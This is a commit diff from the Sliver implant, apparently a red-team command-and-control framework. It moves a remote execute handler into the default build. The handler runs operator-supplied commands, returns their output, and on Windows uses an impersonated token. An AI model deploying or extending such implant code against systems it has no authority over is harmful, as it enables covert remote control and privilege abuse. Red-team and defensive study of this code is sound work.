Added execute to default builds

BishopFox · Dec 20, 2020 · 8e4e752 · 8e4e752
1 parent 61a52a5
commit 8e4e752
Show file tree

Hide file tree

Showing 3 changed files with 63 additions and 58 deletions.
diff --git a/implant/sliver/handlers/generic-rpc-handlers.go b/implant/sliver/handlers/generic-rpc-handlers.go
@@ -23,18 +23,13 @@ package handlers
 import (
 	"fmt"
 	"net"
-	"os/exec"
 	"strings"
 
 	// {{if .Config.Debug}}
 	"log"
 	// {{end}}
 
 	// {{if eq .Config.GOOS "windows"}}
-	"syscall"
-
-	"github.com/bishopfox/sliver/implant/sliver/priv"
-	"golang.org/x/sys/windows"
 
 	// {{end}}
 
@@ -217,56 +212,6 @@ func ifconfig() *sliverpb.Ifconfig {
 	return interfaces
 }
 
-func executeHandler(data []byte, resp RPCResponse) {
-	var (
-		err error
-	)
-	execReq := &sliverpb.ExecuteReq{}
-	err = proto.Unmarshal(data, execReq)
-	if err != nil {
-		// {{if .Config.Debug}}
-		log.Printf("error decoding message: %v", err)
-		// {{end}}
-		return
-	}
-
-	execResp := &sliverpb.Execute{}
-	cmd := exec.Command(execReq.Path, execReq.Args...)
-
-	//{{if eq .Config.GOOS "windows"}}
-	cmd.SysProcAttr = &windows.SysProcAttr{
-		Token: syscall.Token(priv.CurrentToken),
-	}
-	//{{end}}
-
-	if execReq.Output {
-		res, err := cmd.CombinedOutput()
-		//{{if .Config.Debug}}
-		log.Println(string(res))
-		//{{end}}
-		if err != nil {
-			// Exit errors are not a failure of the RPC, but of the command.
-			if exiterr, ok := err.(*exec.ExitError); ok {
-				execResp.Status = uint32(exiterr.ExitCode())
-			} else {
-				execResp.Response = &commonpb.Response{
-					Err: fmt.Sprintf("%s", err),
-				}
-			}
-		}
-		execResp.Result = string(res)
-	} else {
-		err = cmd.Start()
-		if err != nil {
-			execResp.Response = &commonpb.Response{
-				Err: fmt.Sprintf("%s", err),
-			}
-		}
-	}
-	data, err = proto.Marshal(execResp)
-	resp(data, err)
-}
-
 func screenshotHandler(data []byte, resp RPCResponse) {
 	sc := &sliverpb.Screenshot{}
 	err := proto.Unmarshal(data, sc)

diff --git a/implant/sliver/handlers/handlers.go b/implant/sliver/handlers/handlers.go
@@ -26,6 +26,11 @@ import (
 	"fmt"
 	"io"
 	"io/ioutil"
+	"os/exec"
+
+	//{{if eq .Config.GOOS "windows"}}
+	"syscall"
+	//{{end}}
 
 	// {{if .Config.Debug}}
 	"log"
@@ -55,9 +60,13 @@ type TunnelHandler func(*sliverpb.Envelope, *transports.Connection)
 // PivotHandler - Handler related to pivoting
 type PivotHandler func(*sliverpb.Envelope, *transports.Connection)
 
-// ------------------------------
-// --- PURE GO HANDLERS ONLY  ---
-// ------------------------------
+// -----------------------------------------------------
+// -----------------------------------------------------
+// -----------------------------------------------------
+// --- PURE GO / PLATFORM INDEPENDENT HANDLERS ONLY  ---
+// -----------------------------------------------------
+// -----------------------------------------------------
+// -----------------------------------------------------
 
 func pingHandler(data []byte, resp RPCResponse) {
 	ping := &sliverpb.Ping{}
@@ -324,6 +333,56 @@ func uploadHandler(data []byte, resp RPCResponse) {
 	resp(data, err)
 }
 
+func executeHandler(data []byte, resp RPCResponse) {
+	var (
+		err error
+	)
+	execReq := &sliverpb.ExecuteReq{}
+	err = proto.Unmarshal(data, execReq)
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("error decoding message: %v", err)
+		// {{end}}
+		return
+	}
+
+	execResp := &sliverpb.Execute{}
+	cmd := exec.Command(execReq.Path, execReq.Args...)
+
+	//{{if eq .Config.GOOS "windows"}}
+	cmd.SysProcAttr = &windows.SysProcAttr{
+		Token: syscall.Token(priv.CurrentToken),
+	}
+	//{{end}}
+
+	if execReq.Output {
+		res, err := cmd.CombinedOutput()
+		//{{if .Config.Debug}}
+		log.Println(string(res))
+		//{{end}}
+		if err != nil {
+			// Exit errors are not a failure of the RPC, but of the command.
+			if exiterr, ok := err.(*exec.ExitError); ok {
+				execResp.Status = uint32(exiterr.ExitCode())
+			} else {
+				execResp.Response = &commonpb.Response{
+					Err: fmt.Sprintf("%s", err),
+				}
+			}
+		}
+		execResp.Result = string(res)
+	} else {
+		err = cmd.Start()
+		if err != nil {
+			execResp.Response = &commonpb.Response{
+				Err: fmt.Sprintf("%s", err),
+			}
+		}
+	}
+	data, err = proto.Marshal(execResp)
+	resp(data, err)
+}
+
 // ---------------- Data Encoders ----------------
 
 func gzipWrite(w io.Writer, data []byte) error {

diff --git a/implant/sliver/handlers/handlers_default.go b/implant/sliver/handlers/handlers_default.go
@@ -40,6 +40,7 @@ var (
 		sliverpb.MsgPwdReq:      pwdHandler,
 		sliverpb.MsgRmReq:       rmHandler,
 		sliverpb.MsgMkdirReq:    mkdirHandler,
+		sliverpb.MsgExecuteReq:  executeHandler,
 	}
 )